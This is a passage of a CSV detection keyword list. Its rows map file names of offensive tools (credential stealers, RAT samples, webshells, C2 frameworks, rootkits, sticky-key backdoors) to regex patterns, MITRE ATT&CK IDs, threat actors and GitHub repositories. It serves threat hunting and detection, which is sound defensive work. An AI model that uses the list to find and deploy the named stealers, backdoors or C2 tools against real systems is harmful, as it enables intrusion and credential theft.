"*\SSH_Keylogger_Stub.exe*",".{0,1000}\\SSH_Keylogger_Stub\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19090" "*\Sst-Sheller.php*",".{0,1000}\\Sst\-Sheller\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19093" "*\stageless.vba*",".{0,1000}\\stageless\.vba.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19094" "*\stageless.vbs*",".{0,1000}\\stageless\.vbs.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19095" "*\stagelessv4.vba*",".{0,1000}\\stagelessv4\.vba.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19096" "*\stagelessv4.vbs*",".{0,1000}\\stagelessv4\.vbs.{0,1000}","offensive_tool_keyword","SharpShooter","Payload 
Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19097" "*\stager.ps1*",".{0,1000}\\stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","19098" "*\StandIn --*",".{0,1000}\\StandIn\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19099" "*\StandIn.exe*",".{0,1000}\\StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19100" "*\StandIn.pdb*",".{0,1000}\\StandIn\.pdb.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19101" "*\StandIn\hStandIn.cs*",".{0,1000}\\StandIn\\hStandIn\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - 
TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19102" "*\StandIn\Program.cs*",".{0,1000}\\StandIn\\Program\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19103" "*\StandIn_Net35.exe*",".{0,1000}\\StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19104" "*\StandIn_Net45.exe *",".{0,1000}\\StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19105" "*\StandIn-1.3.zip*",".{0,1000}\\StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19106" "*\stardust.x64.bin*",".{0,1000}\\stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - 
T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19107" "*\stardust.x64.exe*",".{0,1000}\\stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19108" "*\Stardust\scripts\loader.x64.exe*",".{0,1000}\\Stardust\\scripts\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19109" "*\Start Menu\Programs\Startup\svchost.exe*",".{0,1000}\\Start\sMenu\\Programs\\Startup\\svchost\.exe.{0,1000}","offensive_tool_keyword","_","known executable in strange location - used by multiple malwares","T1037 - T1059 - T1547","TA0003 - TA0005?","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19123" "*\start_campaign.py*",".{0,1000}\\start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","19124" "*\StayKit.cna*",".{0,1000}\\StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 
- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","19126" "*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19127" "*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19128" "*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19129" "*\Stealer.sln*",".{0,1000}\\Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19130" "*\Stealer\modules\Passwords.cs*",".{0,1000}\\Stealer\\modules\\Passwords\.cs.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19131" "*\Stealer\Stealer\modules\*",".{0,1000}\\Stealer\\Stealer\\modules\\.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium 
based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19132" "*\Stealing.cpp*",".{0,1000}\\Stealing\.cpp.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19133" "*\StealTokenClient.exe*",".{0,1000}\\StealTokenClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19134" "*\StealTokenDrv.cpp*",".{0,1000}\\StealTokenDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19135" "*\StealTokenDrv.exe*",".{0,1000}\\StealTokenDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19136" "*\stickykey.ps1*",".{0,1000}\\stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","19137" "*\Stickykeys.sh*",".{0,1000}\\Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19138" "*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19139" "*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black 
Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19140" "*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19141" "*\stolen_cookies.txt*",".{0,1000}\\stolen_cookies\.txt.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","19142" "*\StolenPasswords.txt*",".{0,1000}\\StolenPasswords\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","19143" "*\Stompy.ps1*",".{0,1000}\\Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19144" "*\StomPY.py*",".{0,1000}\\StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19145" "*\Stompy-main\*",".{0,1000}\\Stompy\-main\\.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19146" "*\stop_outlook.py*",".{0,1000}\\stop_outlook\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19147" "*\stop_outlook.txt*",".{0,1000}\\stop_outlook\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of 
outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19148" "*\StopProcessCommand.cs",".{0,1000}\\StopProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19149" "*\StormRat.exe*",".{0,1000}\\StormRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19151" "*\Stowaway\admin\*",".{0,1000}\\Stowaway\\admin\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19152" 
"*\Stowaway\agent\*",".{0,1000}\\Stowaway\\agent\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19153" "*\Stowaway\ansicon\*",".{0,1000}\\Stowaway\\ansicon\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19154" "*\subbrute.py*",".{0,1000}\\subbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","19159" "*\Suborner.sln*",".{0,1000}\\Suborner\.sln.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","19160" "*\suncrypt.html*",".{0,1000}\\suncrypt\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19161" "*\sunder.exe*",".{0,1000}\\sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD 
exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","19162" "*\Suntour.ps1*",".{0,1000}\\Suntour\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19163" "*\Supernova.exe*",".{0,1000}\\Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","19167" "*\SuperPuTTY.csv*",".{0,1000}\\SuperPuTTY\.csv.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","19168" "*\Supershell.tar.gz*",".{0,1000}\\Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19169" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19170" "*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19171" "*\Suprise\Suprise.exe*",".{0,1000}\\Suprise\\Suprise\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19180" "*\SurveyFile_x64_Release.exe*",".{0,1000}\\SurveyFile_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19181" "*\SurveyRegistry_x64_Release.exe*",".{0,1000}\\SurveyRegistry_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19182" "*\svchost_console.exe*",".{0,1000}\\svchost_console\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - 
